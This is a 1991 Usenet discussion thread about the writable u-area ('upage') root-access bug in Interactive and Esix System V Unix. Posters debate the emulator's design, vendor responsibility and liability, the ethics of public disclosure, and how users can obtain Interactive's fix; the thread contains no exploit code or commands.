simple. Disable the mapping of the user block into user space, then have
the emulator allocate memory, use high stack, or otherwise look in a
more sensible place. I'd bet that there's one pointer to the user block
structure, and that changing the logic which initializes it would
suffice.
-- 
bill davidsen - davidsen@sixhub.uucp (uunet!crdgw1!sixhub!davidsen)
    sysop *IX BBS and Public Access UNIX
    moderator of comp.binaries.ibm.pc and 80386 mailing list
"Stupidity, like virtue, is its own reward" -me

larry@nstar.rn.com (Larry Snyder) (02/19/91)

jdeitch@jadpc.cts.com (Jim Deitch) writes:

>  I tried to fix the problem temporarily by setting UAREARW to 0 as
>was posted.  I rebult the kernel and all was well, until cnews tried
>to run.  I got a core dump from sendbatches.  Also the dfspace utility
>would not work.  Anyone else seen this?  I am running ISC 2.2 w/o a
>coprocessor.  Do I also have to set UAREAUS to 0 to make this "fix"
>work?

we had the same problem here on nstar.rn.com with cnews bitching after
rebuilding the kernel with the additional fields set in the kernel

there is no fix for ISC 2.2 without a co as of this time and those
2 fields are of no value unless you are running with a coprocessor


-- 
   Larry Snyder, NSTAR Public Access Unix 219-289-0287 (HST/PEP/V.32/v.42bis)
                        regional UUCP mapping coordinator 
               {larry@nstar.rn.com, ..!uunet!nstar.rn.com!larry}

sef@kithrup.COM (Sean Eric Fagan) (02/19/91)

In article <3227@sixhub.UUCP> davidsen@sixhub.UUCP (bill davidsen) writes:
>  My understanding is that the emulator is keeping the fake registers
>in the user area, and mapping that into addressable user space. 

Well, in that sense, your understanding is wrong.  Actually, it's just
limited.  Lots of small parts of your posting were wrong; so I think you've
just got a wrong picture of the entire thing.

First of all, the emulator is only using the registers that the kernel would
have saved for context switches; why bother using another 70 bytes?

As for using high stack space, keep in mind that the emulator is *not* part
of the kernel, it is *not* part of "system services."  How do you propose
the emulator find out where 'high stack space' is?  I believe stack start is
dependent on data end, isn't it?  And the emulator has no idea what the
process' structure looks like.

>  Again, I may be missing something, but the solution seems pretty
>simple. Disable the mapping of the user block into user space, then have
>the emulator allocate memory, use high stack, or otherwise look in a
>more sensible place. I'd bet that there's one pointer to the user block
>structure, and that changing the logic which initializes it would
>suffice.

Where would you put the user block?  It has to go *somewhere*.  Where is
high stack?  Where is data begin?  How about code begin?  How about data
end?  Or code end?  Or bss end/begin?

Tell you what, bill.  You can write a new emulator that lives in kernel
space.  That will make you much happier, I bet.  It will also slow down
systems without fpus by a considerable margin (the context switch times
would go up *enormously*).

SCO managed to get it working before their first release; AT&T and Dell
managed to get it "fixed" for their second release.  All without having to
redesign an enormous program written entirely in assembly.  Or would you
rather that the fpu emulator have more bugs introduced?

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

mattij@tuura.UUCP (Matti Joutkoski) (02/19/91)

chip@tct.uucp (Chip Salzenberg) writes:

>I'm sorry, but SCO C2 security is still a botch.

Haven't heard about 3.2.2? During installation, you can CHOOSE, do you
want to use C2 or NOT!

-- 
---------------------------------------------------------------
Matti Joutkoski, mattij@yj.data.nokia.fi, tel. + 358-0-5673866.
---------------------------------------------------------------

pcg@cs.aber.ac.uk (Piercarlo Grandi) (02/19/91)

On 18 Feb 91 02:04:24 GMT, davidsen@sixhub.UUCP (Wm E. Davidsen Jr) said:

davidsen> In article <27B93F44.5606@tct.uucp> chip@tct.uucp (Chip
davidsen> Salzenberg) writes:

	[ .. on the appalling trapdoor in SysV 3.2 that turns the Unix
	kernel itself into a trojan horse ... ]

davidsen> I am amazed that the companies didn't fix it instantly and
davidsen> send it by registered express mail to every owner.

And admit that the problem exists? The first thing their attorney will
have told them must have been "don't admit anything". They tried to hush
things initially.

davidsen> In today's litigatious climate, I can see a jury finding them
davidsen> negligent.

Negligent of what? Technically and practically, all these vendors are
just selling you defect free floppies. The usefulness of their contents
are explicitly disclaimed in every possible way. Only an irresponsible
person does not read the warranties, especially when they are so clear
and explicit. You may think that uniform warranty legislation is the
answer, but then this would kill off free sw of any type.

I think that in legal terms, and in practical terms as well, the
perpetrators of this debacle have been perfectly honest -- they *do*
sell you defect free floppies, and if they are not defect free they will
eventually (slowly, apparently :-/) replace them with defect free ones
for a period of up to 90 days. They promise you something, they keep
their promise. Don't take them to task for failing to deliver soemthing
they have never promised, like Unix, or a secure Unix, or a Unix in
which there are no trapdoor.

For all we know there is the in System V shell a secret "becomeroot"
command that allows those "in the know" to become root exploiting the
u-area trapdoor. How do you know there is no such command or option? Do
any of the System V suppliers promise you that there is no such thing?
No, actually they disclaim any representation to this effect.

If *you* think that you are purchasing a Unix product, that's *your*
problem. You are in fact purchasing System V brand defect free floppies,
for over $1,000. Up to you to decide whether a set of defect free
floppies (and a chance, for which you take all responsibility, at
running whatever is recorded on them) is worth $1,000. You are never
misled about what your money is really buying.

Naturally we both know what's the _real_ story, but what is written
above seems to me logically flawless. Much more dangerous
misunderstandings can happen:

I remember a jerk that had complained that the Internet Worm had caused
a downtime of two days on his Unix based network and his organization
could not afford a two day downtime for the whole network. I would have
promoted the jerk to assistant janitor on the spot, because somebody
that cannot afford a two day downtime cannot run software whose warranty
states that in the event of problems *you* are liable to pay damages to
the software's *supplier*.
--
Piercarlo Grandi                   | ARPA: pcg%uk.ac.aber.cs@nsfnet-relay.ac.uk
Dept of CS, UCW Aberystwyth        | UUCP: ...!mcsun!ukc!aber-cs!pcg
Penglais, Aberystwyth SY23 3BZ, UK | INET: pcg@cs.aber.ac.uk

steve@nuchat.sccsi.com (Steve Nuchia) (02/19/91)

In <1991Feb16.214824.2790@kithrup.COM> sef@kithrup.COM (Sean Eric Fagan) writes:
>any lower ring sometime; it's disgusting.)  Since it runs in the same ring
>as your process, it looks just like it is part of your process (i.e., if
>you're using the emulator, you seem to have a multi-segment process).  Since
>it needs to keep the fp registers somewhere, and they are very much
>process-related, the "proper" place to keep them is in the u area, just like
>other registers.

Unmitigated bullshit.

The decision to have the emulator store its variables in the u-area
was simple laziness.  The decision to leave it there after it was
realized that it was a security hole was *negligent* laziness.

The only technical justification for putting them there are
	1) so they get initialized at startup without additional
		code in exec.
	2) to avoid having to allocate a chunk of data space and
		figure out how to address it from the emulator.

A third possibility would be a multiprocessor box where a process
might migrate between CPUs with and without coprocessors.  Or
maybe so you can hot-plug the fool things.  Having the emulator
keep its variables in the same place as the coprocessor does
(when the process is asleep) would make these work.

None of these are any where near strong enough to make a sane person
think for a moment that leaving u writable is justified.

Feh.
-- 
Steve Nuchia	      South Coast Computing Services      (713) 964-2462
	"Innocence is a splendid thing, only it has the misfortune
	 not to keep very well and to be easily misled."
	    --- Immanuel Kant,  Groundwork of the Metaphysic of Morals

pdg@chinet.chi.il.us (Paul Guthrie) (02/19/91)

I'm sick of people calling this a "gaping
kind-you-can-drive-a-truck-through hole" in UNIX security.  If it
was so gaping, how come it has never come up here before, like so
many other obscure problems?  ISC was fixing this, and if that
idiot had kept his mouth shut, it would have been fixed in time,
without many of us rushing out to buy coprocessors.  He even
admitted it didn't affect his site.  This was an act of pure
stupidity.  If indeed he had been after ISC to get a fix, why wasn't
a note like: "There is a terrible bug in ISC UNIX security that
allows root access instantaneously.  I have mailed the problem to
ISC (or reported the bug) to ISC and will post the problem in 3
months.  The clock is ticking ISC...." posted.  The posting of
source code to crack a system and binaries even was nothing more
than glory-hounding, sort of like saying "See what I know and you
don't".  This person is immature, irresponsible and has caused a lot
of people a lot of trouble.  If indeed his cause was to get the bug
fixed to stop "security problems" he would not have caused a
multitude more in the short term.  
-- 
Paul Guthrie
chinet!nsacray!paul or pdg@balr.com or attmail!balr!pdg

pdg@chinet.chi.il.us (Paul Guthrie) (02/19/91)

In article <3215@sixhub.UUCP> davidsen@sixhub.UUCP (bill davidsen) writes:
>| Oh my god - its really true. (on my ISC 2.0.2 *with* co-proc.)
>  Here's a though for you, since the bug is in the emulator, and you
>have a coprocessor, could it be that the system isn't seeing the coproc,
>and that when you find out why, not only will the bug go away, but the
>system should be a tad faster, too.


No, all 2.0.2 systems.  The 2.2 release notes showing a half hearted
attempt to fix the problem is what lead most of us onto this in the
first place.

-- 
Paul Guthrie
chinet!nsacray!paul or pdg@balr.com or attmail!balr!pdg

rbe@yrloc.ipsa.reuter.COM (Robert Bernecky) (02/19/91)

I have been watching the flood of "oh, how could they ever be so stupid/
incompetent", etc messages go by on this topic, but I can't take it no 
more Captain...

Anybody who is stuck writing programs in ANY computer language, including
APL and C today is going to write code that has bugs in it. Period. ENd
of story. No way around it. Programming is not YET an engineering 
type of job. Should be. Ain't. Nobody knows how to make it so.


Heaping shit on the developers is NOT going to help anyone.

If you want to make a concrete contribution to the world of computing,
figure out how to turn computing from an art into a science. I have yet
to meet a computer scientist, in spite of working in this trade since
1962.

Stop wringing your paws, and get down and do some USEFUL work. Jeesh.

Of course, it is highly desirable for the developers of said bug to 
provide a fix asap. AND to ensure they don't reintroduce it later on,
and so on. 

Bob Bernecky
Snake Island Research Inc.

james@bigtex.cactus.org (James Van Artsdalen) (02/19/91)

In <1991Feb19.015227.26159@nuchat.sccsi.com>, steve@nuchat.sccsi.com
	(Steve Nuchia) wrote:

> In <1991Feb16.214824.2790@kithrup.COM> sef@kithrup.COM
	(Sean Eric Fagan) writes:

| you're using the emulator, you seem to have a multi-segment
| process).  Since it needs to keep the fp registers somewhere, and they
| are very much process-related, the "proper" place to keep them is in
| the u area, just like other registers.

> Unmitigated bullshit.

oh?  I see you haven't thought the problem through yet.

> The only technical justification for putting them there are
> 	1) so they get initialized at startup without additional
> 		code in exec.
> 	2) to avoid having to allocate a chunk of data space and
> 		figure out how to address it from the emulator.

Now, think about sdb, and then propose a solution.

Remember, we're not out to remove things from the u block, only to
make sure that important things aren't writable.  Those are very
different goals.

Also, remember that Sean is talking about SCO's *solution*, which
already works and is in the field.  Until yours is implemented and
working, don't be so quick to criticize.
-- 
James R. Van Artsdalen          james@bigtex.cactus.org   "Live Free or Die"
Dell Computer Co    9505 Arboretum Blvd Austin TX 78759         512-338-8789

junk1@cbnews.att.com (eric.a.olson) (02/19/91)

In article <1991Feb18.140624.1860@virtech.uucp> cpcahil@virtech.uucp (Conor P. Cahill) writes:
>
>THE uunencoded binary is not less dangerous.  I meant "a uuencoded binary
>that proves that root access was obtained without damaging the security
>of the system".
>
	Oh, come on, Conor...you would run a _binary_ file that
	proves that root access was obtained and that _claims_ not
	to have damaged the security system?  I would not.  I tried
	the source (segmentation violation on AT&T 3.2.1 and 3.2.2
	with no co-proc).   I think that perhaps the best of both
	worlds would have been served with the simple statement,
	"The u-area is not write-protected on all versions of the
	UNIX operating system."
							
						eric a. olson
						eao@mvucl.att.com

larry@nstar.rn.com (Larry Snyder) (02/19/91)

pdg@chinet.chi.il.us (Paul Guthrie) writes:

>many other obscure problems?  ISC was fixing this, and if that
>idiot had kept his mouth shut, it would have been fixed in time,
>without many of us rushing out to buy coprocessors.  He even

Personally, I am glad this bug was brought up here for all of us
to see - with complete source code documenting the problem --

kudos to the original poster :)


-- 
   Larry Snyder, NSTAR Public Access Unix 219-289-0287 (HST/PEP/V.32/v.42bis)
                        regional UUCP mapping coordinator 
               {larry@nstar.rn.com, ..!uunet!nstar.rn.com!larry}

evan@telly.on.ca (Evan Leibovitch) (02/19/91)

Considering the timing of when this whole discussion started, and the
revelation that Release 4 does not have the problem, perhaps this is
the vendors' collectinve way of getting us all to upgrade to R4.

(Except for SCO, of course. Heaven forbid *they'd* want anyone to
upgrade to R4 ;-).

Followups to alt.consipracy :-) ?

-- 
 Evan Leibovitch, Sound Software, located in beautiful Brampton, Ontario
       evan@telly.on.ca / uunet!attcan!telly!evan / (416) 452-0504
         Ididntdoit, nobodysawmedoit, youcantproveathing. - Bart

david@talgras.UUCP (David Hoopes) (02/19/91)

In article <1013@tuura.UUCP> mattij@tuura.UUCP (Matti Joutkoski) writes:
>chip@tct.uucp (Chip Salzenberg) writes:
>
>>I'm sorry, but SCO C2 security is still a botch.
>
>Haven't heard about 3.2.2? During installation, you can CHOOSE, do you
>want to use C2 or NOT!
>

Not exactly, you can choose if you want C2 relaxed or not.  There is still
no way to get rid of it.  I just spent a whole week wasted because of that
C2 junk.  


I hate C2.  I hate it alot.




-- 
---------------------------------------------------------------------
David Hoopes                              Tallgras Technologies Inc. 
uunet!talgras!david                       11100 W 82nd St.          
Voice: (913) 492-6002 x323                Lenexa, Ks  66214        

mjhammel@Kepler.dell.com (Michael J. Hammel) (02/20/91)

In article <446@bria>,  writes:
> In an article, unix386.Convergent.COM!mburg (Mike Burg) writes:
> >In article <27B93F44.5606@tct.uucp>, chip@tct.uucp (Chip Salzenberg) writes:
> 
> >I think the blame should be placed on AT&T. They are the
> >ones who are (were) shipping the base source with the bug. Most AT&T UNIX
> >vendors typically only concentrate on adding more options to the system
> >(i.e. X-Windows, more controller card support, networking). They usually
> >don't looking into rats mazes like memory managment.  Now, look it from the
> >vendors eye's - You'd be expecting for AT&T to ship a somewhat "secure" (if
> >you can call it that) product, without serious holes like this one. [...]
> 
> Bullocks.  The simple fact that it has come from AT&T does not mean it
> excuses a company who is going to refurbish and _resell_ it from going
> through it with a fine tooth comb.  Once it's out that door with that
> company's name on it, it's not AT&T's problem anymore.
> 

This is a poor analogy but...

If Ford buys 1000 bolts to hold its motors in its cars and the bolts
break do you blame Ford or the bolt manufacturer?  Remember (in this
case), testing bolts to see if they will break under pressure is
destructive testing, thus not every bolt could be tested, either by Ford
or the bolt manufacturer.  

The point is that if the reseller of the product does not have the
resources to retest what was delivered by the original developer then
the reseller isn't going to do so.  Why can't the reseller expect that
the original developer had fully tested the original product?  The
reseller should only have to be responsible for what the reseller
modifies (and anything that might get broke because of those
modifications).  However, if the reseller wishes to save face, it will
make every attempt to fix things that it didn't break anyway.  :-)

> >Face it folks, all versions of Unix for the PC have problems of some kind.
> >(Just a matter of what size the explosion will be when it goes off in your
> >face) It ain't no Ginsu knive offer - ("It dices, it slices, it's a
> >mutlitasking OS and a teeth cleaner! And if you order now you'll
receive....")
> 
> True enough, but this no reason for the user to not _expect_ a bug-free
> version.  Yes, it is pie-in-the-sky, but every company's objective should
> be to provide a bug-free product (not a product that has known bugs, or
> has them as "features").
> 
The customer has a right to expect such things, but with large scale
software development its not always possible to provide bug-free code in
a timely and low-cost manner.  Its a trade-off.  Part of the developers
(or resellers) responsibility is to eliminate as many problems as
possible in as short a time frame as possible (both for convenience to
the customer and to beat the competition to the punch).  In some cases,
such as with UNIX, many customers are willing to accept a certain level
of bugs in order to get "the latest-greatest" ASAP.  In other cases,
bug-free software is a necessity (like in communications satellites). 
Notice that versions of UNIX come out much more often and at lower cost
than *most* satellites. ;-)

> How about forcing them to give prior disclosure of all known bugs, _outside_
> of the shrink wrap?  How about forcing them to provide _free_ bug-fixes on
> a regular basis?  How do you force them?  Don't buy until they do it.  No
> company is motivated to change unless it socks 'em in the wallet.
> 

I'm not sure about the bug lists, but I do believe some companies offer
free bug-fixes for current customers.  Major revisions might be at cost
for current customers.  The question is how much can you give away
before you start losing money?  (That is, unfortunately, the reason most
companies are in business.  *sigh*)

Michael J. Hammel        | mjhammel@{Kepler|socrates}.dell.com
Dell Computer Corp.      | {73377.3467|76424.3024}@compuserve.com
#include <disclaim/std>  | zzham@ttuvm1.bitnet | uunet!uudell!feynman!mjhammel
#define CUTESAYING "Lead, follow, or get the hell out of the way."

paul@frcs.UUCP (Paul Nash) (02/20/91)

Thus spake sef@kithrup.COM (Sean Eric Fagan):

> In article <1991Feb16.162814.13117@unixland.uucp> bill@unixland.uucp (Bill Heiser) writes:
> >This is a good question (for those of us who don't know) -- how does
> >one edit binaries in Unix?  Is there a utility like Norton out there
> >(yes, I know Norton is available for ISC, but I'm running Esix).
>
> I always use emacs for that purpose.  It's quite handy at some things...

For those with limited disk space (and a shortage of META-keys),
try xvi.  It does most of the vi commands, and is small (87 kb
source, 71 kb binary on Unix/386)


 ---=---=---=---=---=---=---=---=---=---=---=---=---=---=---=---=---=---
Paul Nash				   Free Range Computer Systems cc
paul@frcs.UUCP				      ...!uunet!m2xenix!frcs!paul

mjhammel@Kepler.dell.com (Michael J. Hammel) (02/20/91)

In article <15297@uudell.dell.com>, mjhammel@Kepler.dell.com (Michael J.
Hammel) writes:
> The point is that if the reseller of the product does not have the
> resources to retest what was delivered by the original developer then
> the reseller isn't going to do so.  Why can't the reseller expect that
> the original developer had fully tested the original product?  The
> reseller should only have to be responsible for what the reseller
> modifies (and anything that might get broke because of those
> modifications).  However, if the reseller wishes to save face, it will
> make every attempt to fix things that it didn't break anyway.  :-)

[ rest of previous post deleted ]

Just thought I'd better add that my last posting was not in defense of
ISC (or anyone else for that matter) shipping broken code.  It was just
generalization on the problems of large scale software development projects.  

Michael J. Hammel        | mjhammel@{Kepler|socrates}.dell.com
Dell Computer Corp.      | {73377.3467|76424.3024}@compuserve.com
#include <disclaim/std>  | zzham@ttuvm1.bitnet | uunet!uudell!feynman!mjhammel
#define CUTESAYING "Lead, follow, or get the hell out of the way."

martys@mchale.ism.isc.com (Marty Stewart) (02/20/91)

	This is mail to address the suggestions that INTERACTIVE either post
the security hole fix to the net or put it on a ftp site where it can be
picked up by users.

	Under the AT&T licensing agreement, INTERACTIVE cannot post AT&T
code to a site where any user can pick it up.  We are under the obligation
to make sure only AT&T licensed users receive binaries that have portions of
AT&T code in them.  The fixes for the security hole are in os.o and as such,
the code cannot be put in a public area.  Another reason for not posting to
the net is that the os.o is quite large and will take up unnecessary band-
width at sites that do not need the INTERACTIVE fix.

	As an alternative to calling support, please send mail to
martys@ism.isc.com and I will see to it that users are sent a fix as soon as
support is given the fix.  I will need an address, the version of software
that you are running and your 2.0.2 or 2.2 serial number.  INTERACTIVE
apologizes for any inconveniences this may cause users.

Marty C. Stewart
Support Team Leader
INTERACTIVE Systems Corp.

erik@gogoman.sf.ca.us (Erik Fortune) (02/20/91)

>Anybody who is stuck writing programs in ANY computer language, including
>APL and C today is going to write code that has bugs in it. Period. ENd
>of story. No way around it. Programming is not YET an engineering 
>type of job. Should be. Ain't. Nobody knows how to make it so.

Re-read the original posting.   The poster wasn't complaining that
the bug existed.  He was complaining that ISC refused to acknowledge
and repair the bug once it was pointed out.   Having bugs in your
code is a part of life.  Refusing to fix a most heinous security hole
like this one is not acceptable.

>Heaping shit on the developers is NOT going to help anyone.

Agreed.  However, heaping truckloads of shit on whoever decided 
that this bug wasn't important to fix, *even though* AT&T had sent 
them a fix is a solemn duty.

>Of course, it is highly desirable for the developers of said bug to 
>provide a fix asap. AND to ensure they don't reintroduce it later on,
>and so on. 

Precisely the intent of the person who started this thread.   After
banging his head against interactive support for far longer than he
should have had to considering the severity of the bug, he decided to
try to embarass them into fixing it.   Looks like it's working.

BTW:
   Another poster compared this to Ford buying bad bolts, but the
analogy doesn't quite fit.   Let's restate it this way:
   Ford buys bad bolts from a bolt manufacturer.   The bolt manufacturer
and a customer both discover the bad bolts and try to get Ford to
replace them; Ford refuses, and continues to use the bolts that they
know to be defective.    I think the liability questions are a little
(say, two orders of magnitude) less fuzzy in this case.

-- Erik
   erik@gogoman.sf.ca

junk1@cbnews.att.com (eric.a.olson) (02/20/91)

In article <113@calcite.UUCP> vjs@calcite.UUCP (Vernon Schryver) writes:
>There is no plausible test that would have found the big, bad bug.  Please
>don't suggest a program that would write to all possible invalid pages in
>the hope of causing something unexpected without providing a way to do that
>quickly enough to be useful, ...

	Oh, give me a break.   SOMEONE must have been responsible
	for seeing whether or not writes to illegal pages get
	stopped by a segmentation fault.   It doesn't take _that_ 
	long to go thru your address space.

chip@tct.uucp (Chip Salzenberg) (02/21/91)

According to pcg@cs.aber.ac.uk (Piercarlo Grandi):
>The first thing their attorney will have told them must have been
>"don't admit anything".

For minor bugs, the old "it's not a bug, it's a feature" spiel might
be a workable alternative.  But I would be flabbergasted if a member
of any U.S. bar association advised Interactive not to 'fess up about
the upage bug, unless said lawyer was misled as to the bug's nature.

>Technically and practically, all these vendors are just selling you
>defect free floppies. The usefulness of their contents are explicitly
>disclaimed in every possible way.

Fortunately, the warranty that asserts this "fact" is not the be-all
and end-all of vendor-customer obligations.
-- 
Chip Salzenberg at Teltronics/TCT      <chip@tct.uucp>, <uunet!pdn!tct!chip>
"It's not a security hole, it's a SECURITY ABYSS." -- Christoph Splittgerber
   (with reference to the upage bug in Interactive UNIX and Everex ESIX)

chip@tct.uucp (Chip Salzenberg) (02/21/91)

According to pdg@chinet.chi.il.us (Paul Guthrie):
>I'm sick of people calling this a "gaping kind-you-can-drive-a-truck-through
>hole" in UNIX security.  If it was so gaping, how come it has never come up
>here before, like so many other obscure problems?

Think about this:  ANYONE CAN BECOME ROOT AT ANY TIME.  That's not a
"gaping" security hole?  If there ever was a bug that deserved the
description "huge, gaping, obvious, drive-a-truck-through-it", it's
this one.

>ISC was fixing this...
 ^^^^^^^^^^^^^^^^^^^

So far, not even the ISC people have claimed that they were fixing it
before the bug report here.  If they had deemed it worth fixing, it
would have been fixed between the release of 2.2 -- the absolutely
latest date that ISC can claim ignorance -- and the release of 2.2.1.
But it wasn't; so they weren't.  QED.

>"There is a terrible bug in ISC UNIX security that allows root access
>instantaneously.  I have mailed the problem to ISC (or reported the bug) to
>ISC and will post the problem in 3 months.  The clock is ticking ISC...."

That would not have allowed the people who care about security to
protect themselves for those three months.  Yes, a coprocessor is
expensive; but would you rather have an expensive, secure system or an
inexpensive one full of holes?  I know I'd turn the latter off.
-- 
Chip Salzenberg at Teltronics/TCT      <chip@tct.uucp>, <uunet!pdn!tct!chip>
"It's not a security hole, it's a SECURITY ABYSS." -- Christoph Splittgerber
   (with reference to the upage bug in Interactive UNIX and Everex ESIX)

mike (02/21/91)

In an article, mjhammel@Kepler.dell.com (Michael J. Hammel) writes:
>This is a poor analogy but...
>
>If Ford buys 1000 bolts to hold its motors in its cars and the bolts
>break do you blame Ford or the bolt manufacturer?  Remember (in this
>case), testing bolts to see if they will break under pressure is
>destructive testing, thus not every bolt could be tested, either by Ford
>or the bolt manufacturer.  

It matters not who is to _blame_.  It does matter who's _responsible_.
You bought your car from Ford.  The motor flies out of the hood because
of defective bolts.  You go to Ford, and they say "Sorry, but you'll have
to talk to ``XYZ Bolt''.  It's not our problem because _we_ didn't make
the bolts."  I personally wouldn't sit still for this, and I doubt you
would either.

Consider that I buy a flavor of UNIX from Dell, and your version has a major
bug which compromises the security of the system.  I could care less that
you originally got the code from AT&T.  You modified it, you put your name on
it, and you sold it to me for a goodly chunk of change.  It isn't going
to be AT&T's door I go banging on.  It's going to be yours.

>The point is that if the reseller of the product does not have the
>resources to retest what was delivered by the original developer then
>the reseller isn't going to do so.  Why can't the reseller expect that
>the original developer had fully tested the original product?  The
>reseller should only have to be responsible for what the reseller
>modifies (and anything that might get broke because of those
>modifications).  However, if the reseller wishes to save face, it will
>make every attempt to fix things that it didn't break anyway.  :-)

The reseller should be responsible for what is sold.  When I buy a flavor
of UNIX, I am buying a complete package, not just modifications.  (Those
who thrive on the legal aspects of this will point out that all you're
really buying is diskettes.  Fine, but a company who treats its customers
accoring to that criteria won't be in business very long.)

>> How about forcing them to give prior disclosure of all known bugs, _outside_
>> of the shrink wrap?  How about forcing them to provide _free_ bug-fixes on
>> a regular basis?  How do you force them?  Don't buy until they do it.  No
>> company is motivated to change unless it socks 'em in the wallet.
>> 
>
>I'm not sure about the bug lists, but I do believe some companies offer
>free bug-fixes for current customers.  Major revisions might be at cost
>for current customers.  The question is how much can you give away
>before you start losing money?  (That is, unfortunately, the reason most
>companies are in business.  *sigh*)

As a consumer, I could quite honestly care less about what your cost is
to insure a working system.  That is your problem, not mine.  If you find
that you can't turn a buck because of an inferior product, then you'll
go out of business.  That's the joy of capitalism.

Cheers,
-- 
Michael Stefanik, MGI Inc., Los Angeles| Opinions stated are not even my own.
Title of the week: Systems Engineer    | UUCP: ...!uunet!bria!mike
-------------------------------------------------------------------------------
Remember folks: If you can't flame MS-DOS, then what _can_ you flame?

chip@tct.uucp (Chip Salzenberg) (02/21/91)

According to rbe@yrloc.ipsa.reuter.COM (Robert Bernecky):
>Anybody who is stuck writing programs in ANY computer language, including
>APL and C today is going to write code that has bugs in it. Period.

Of course.  But any company that sells version after version of an OS,
knowing full well that each of those versions has a truck-sized hole
in its security, and not taking step one to fix that bug, deserves all
the criticism that can be generated.

(BTW, I know that there are people at ISC, and I presume also at
Everex, that knew about the bug and tried to get it fixed.  I
sympathize with you for having chosen bozos for employers.)
-- 
Chip Salzenberg at Teltronics/TCT      <chip@tct.uucp>, <uunet!pdn!tct!chip>
"It's not a security hole, it's a SECURITY ABYSS." -- Christoph Splittgerber
   (with reference to the upage bug in Interactive UNIX and Everex ESIX)

vjs@calcite.UUCP (Vernon Schryver) (02/21/91)

In article <1991Feb20.124535.10669@cbnews.att.com>, junk1@cbnews.att.com (eric.a.olson) writes:
> In article <113@calcite.UUCP> vjs@calcite.UUCP (Vernon Schryver) writes:
> >There is no plausible test that would have found the big, bad bug.  Please
> >don't suggest a program that would write to all possible invalid pages in
> >the hope of causing something unexpected without providing a way to do that
> >quickly enough to be useful, ...
> 
> 	Oh, give me a break.   SOMEONE must have been responsible
> 	for seeing whether or not writes to illegal pages get
> 	stopped by a segmentation fault.   It doesn't take _that_ 
> 	long to go thru your address space.

Perhaps it would be fast enough.  Please do the math.  Then figure how long
it would take for the test program to do something more than trash the user
process, the "benign" result.

Now please consider what would happen in real life:

    tester:  "Gee, test123456 just found that it can write to address 0xblah."

    test manager:  "Uh, oh!  Call a meeting of all 3rd and 4th level
	engineering and manufacturing managers.  The new release is unusable!".

    ... 13 weeks and 1000 hours of meetings and memos later ...

    1st level engineering manager to tech lead: "Software QA just found that
	    a user process does not get a fault when writing to address 0xblah."
	    What should we do?"

    tech lead:  "Don't have a cow.  It's only where the FP registers are saved."

    ... 2 weeks and 3 meetings later ...

    test manager to tester: "Change test123456 to not worry about address
	0xblah.  It's not a problem."

    ... 6 months later ...

    1000's of USENET posters have a cow.

I've played parts in many of these circuses over the last decades, tho I've
never worked for ISC and have never had the chance for so many USENET
experts to second guess me all at once.

Vernon Schryver,   vjs@calcite.uucp

jca@pnet01.cts.com (John C. Archambeau) (02/21/91)

martys@mchale.ism.isc.com (Marty Stewart) writes:
>
>	This is mail to address the suggestions that INTERACTIVE either post
>the security hole fix to the net or put it on a ftp site where it can be
>picked up by users.
>
>	Under the AT&T licensing agreement, INTERACTIVE cannot post AT&T
>code to a site where any user can pick it up.  We are under the obligation
>to make sure only AT&T licensed users receive binaries that have portions of
>AT&T code in them.  The fixes for the security hole are in os.o and as such,
>the code cannot be put in a public area.  Another reason for not posting to
>the net is that the os.o is quite large and will take up unnecessary band-
>width at sites that do not need the INTERACTIVE fix.
>
>	As an alternative to calling support, please send mail to
>martys@ism.isc.com and I will see to it that users are sent a fix as soon as
>support is given the fix.  I will need an address, the version of software
>that you are running and your 2.0.2 or 2.2 serial number.  INTERACTIVE
>apologizes for any inconveniences this may cause users.

Now this is getting to be a bloody sick joke.  I find it a little bit
difficult to believe that there just isn't a simple binary patch for os.o much
along the same lines as the inode patch that has been floating around for
ages.  Might I remind you that SCO provides their patches and fixes to the
public via anonymous UUCP.

This is going about as well as a SCUD missile attack.  Maybe we should get Joe
Isuzu to head ISC tech support.  At least then we know that we're getting the
shaft and ISC is getting the gold mine.

I want the patch in my hot little hands before the customer goes out and buys
ISC.  Such security holes are intolerable.

Maybe we should all send suggestions to Saturday Night Live for an 'Anal
Retentive Unix Vendor' skit?

     // JCA

 /*
 **--------------------------------------------------------------------------*
 ** Flames  : /dev/null                     | What to buy?
 ** ARPANET : crash!pnet01!jca@nosc.mil     | EISA or MCA?
 ** INTERNET: jca@pnet01.cts.com            | When will the bus wars end?
 ** UUCP    : {nosc ucsd hplabs!hp-sdd}!crash!pnet01!jca
 **--------------------------------------------------------------------------*
 */

mjhammel@Kepler.dell.com (Michael J. Hammel) (02/21/91)

In article <113@calcite.UUCP>, vjs@calcite.UUCP (Vernon Schryver) writes:
> In article <15297@uudell.dell.com>, mjhammel@Kepler.dell.com (Michael
J. Hammel) writes:
> >     .... Why can't the reseller expect that
> > the original developer had fully tested the original product?
> 
> Have I correctly inferred that the author either works in a testing
> organzation or in a non-technical or at least non-software capacity at Dell?
> 

Test engineer.  Software and Hardware in R&D.

> There is no plausible test that would have found the big, bad bug.  Please
> don't suggest a program that would write to all possible invalid pages in
> the hope of causing something unexpected without providing a way to do that
> quickly enough to be useful, and with a way to reliably detect that
> something more interesting than the FP registers were trashed.
> 

I misrepresented what I was trying to say.  I wasn't suggesting that the
particular bug that has been discussed lately could have been found this
way.  Its just that its oftern hard to point to *exactly* who should be
responsible for some problem when various groups have their fingers in
the code.  Besides, I've learned, as a test engineer, that pointing
doesn't solve the problem.  In fact, it often slows the fixes
development.  As a tester, however, I can't help but point at myself for
a bug that gets by.  After all, its my *job* to find bugs.

> There has been enduring interest in proofs of correctness, ADA, and the
> rest of the "constructive" software reliablity stuff, because testing finds
> only a minority of the bugs.  Testing is good for knowing if an old bug has
> reappeared and for knowing if the build was a complete failure.  That's all.
> 

I wouldn't say its that unimportant.  A major part of testing (it
shouldn't be this way, but often ends up like this) is to uncover the
bugs "on the surface" so the product looks good to the user.  The more
important (often more destructive) bugs take longer to find (either by
automated testing or just be sheer accident) and often don't get found
because of time constraints to get a product to market.  

I suppose it depends on how one views "testing", as a non-technical part
of the development process, or a more sophisticated and integral part of
the development process (thats not a good description, but I think you
understand what I mean).

We should probably move this discussion to comp.software-eng.  Or email
me if you'd liked to talk more about it.

Michael J. Hammel        | mjhammel@{Kepler|socrates}.dell.com
Dell Computer Corp.      | {73377.3467|76424.3024}@compuserve.com
#include <disclaim/std>  | zzham@ttuvm1.bitnet | uunet!uudell!feynman!mjhammel
